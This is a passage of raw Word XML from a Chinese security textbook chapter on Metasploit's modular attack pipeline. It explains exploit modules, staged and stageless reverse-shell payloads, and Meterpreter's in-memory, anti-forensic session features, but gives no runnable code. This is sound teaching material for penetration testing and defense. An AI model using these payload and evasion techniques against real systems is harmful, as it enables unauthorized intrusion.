        <w:t xml:space="preserve"> E -- Yes --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">F[选择并配置&lt;br&gt;Encoder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块];</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> F --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">G[生成最终攻击载荷];</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> E -- No --&gt; G;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> G --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">H[执行攻击&lt;br&gt;建立会话];</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> H --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">I[后渗透操作&lt;br&gt;Post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 17-1 Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模块化攻击流水线</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这一流水线的实质，是将“打破约束”这一总目标分解为多个独立的工程问题。这种解耦设计，是当前绝大多数主流渗透测试框架的共同范式，本书以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为标本进行剖析。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="298"/>
    <w:bookmarkStart w:id="305" w:name="模块类型深度剖析"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">17.1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块类型深度剖析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的模块共分六大类，每类承担流水线中一个特定的职责。理解它们的输入、输出和内部状态，是有效使用框架和防御相应攻击的基础。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="299" w:name="exploit-模块漏洞利用模块"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块（漏洞利用模块）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">职责</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：触发目标系统上存在的特定安全漏洞，执行攻击者定义的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload。这是“打破系统正常行为约束”的执行器。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">工作原理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块封装了针对一个或多个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编号漏洞的利用代码。其内部逻辑通常包含：与目标服务建立连接、发送精心构造的畸形输入（触发栈溢出、格式字符串漏洞等）或逻辑利用序列（如未授权文件上传、命令注入），最终将程序控制流劫持到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码所在的内存空间。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">关键技术概念</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标（Target）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块内通常内置了多个“Target”选项，对应不同的目标操作系统版本、语言包或补丁级别。这是因为同一漏洞在不同内存布局下，其利用所需的硬编码地址（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址）会完全不同。选择错误的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Target </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是导致漏洞利用失败的常见原因②。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检查（Check）命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：多数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块实现了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方法。此方法会以安全、非破坏性的方式探测目标是否存在该漏洞，而不真正执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload。这是授权渗透测试中的标准流程，用于在发起可能非稳定的攻击前进行确认。其实现原理因漏洞而异，可能是发送一个特定探测包并检验响应，或是尝试触发一个无害的逻辑分支。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="299"/>
    <w:bookmarkStart w:id="300" w:name="payload-模块攻击载荷模块"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块（攻击载荷模块）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">职责</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在漏洞被成功触发后执行的代码。它是攻击者在目标系统上实现其最终意图的代理。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">分类原理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块体系中最具创造性的部分，其子分类直接决定了攻击的隐蔽性、稳定性和通道特性。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Staged（分阶段）vs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Stageless（无阶段）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：这是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最根本的设计分水岭。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Stageless Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：一个自包含的、完整的、可直接执行的代码块。例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/shell_reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">就是一个完整的反向连接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell。其优点是逻辑简单、不依赖中间传输环节，缺点是个头通常较大，在受严格内存空间限制的漏洞（如典型的栈溢出）中可能无法容纳。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Staged Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：为了解决尺寸问题而生。它由一个极小的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Stager（阶段加载器）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和一个功能完整的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Stage（阶段主体）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组成。Exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行时，仅将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Stager </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">投递入目标进程。Stager</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的唯一任务是与攻击机建立网络连接，下载体积更大的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage，将其注入内存并执行。例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">前的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是其使用的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Stager。Stager </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码精简（通常几百字节），能适应极为苛刻的溢出环境①。Stage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DLL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">反射注入等高级内存加载技术运行，不落盘，极大增加了取证难度①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内联（Inline）Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：此类型特指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Stageless </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/meterpreter_reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。注意其命名规则，由单个下划线连接。它依然是完整独立的代码块，相较于其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Staged </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本网络通信开销更小，稳定性更高，但需要漏洞提供足够大的代码执行空间①。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="300"/>
    <w:bookmarkStart w:id="301" w:name="meterpreter元载荷与高级会话"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter：元载荷与高级会话</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">定位与原理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Meterpreter（Meta-Interpreter，元解释器）是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架的王牌，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">它不是单个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Payload，而是一个高级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">体系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。传统的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload（如简单反向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell）只在攻击者和目标之间建立一个直接的输入/输出（I/O）通道，而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">建立的是一个基于类型-长度-值（Type-Length-Value,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TLV）协议的加密通信信道②。在这个信道上，攻击者可以动态地向内存中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">核心注入扩展模块、功能库，实现按需加载，无需生成并传输新的可执行文件。所有的核心操作均在内存中完成，默认不修改目标硬盘上的文件系统，这是其“高级”的基石①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的核心能力</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">免文件攻击与进程注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行在受攻击进程的内存空间中，或可以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">migrate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令无缝地将自身移植到另一个正在运行的、更稳定或权限更高的进程中。这一过程利用标准的进程间内存操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">API，不创建新的进程服务，使其在行为监测层面高度隐蔽①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">加密与隧道通信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话支持通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
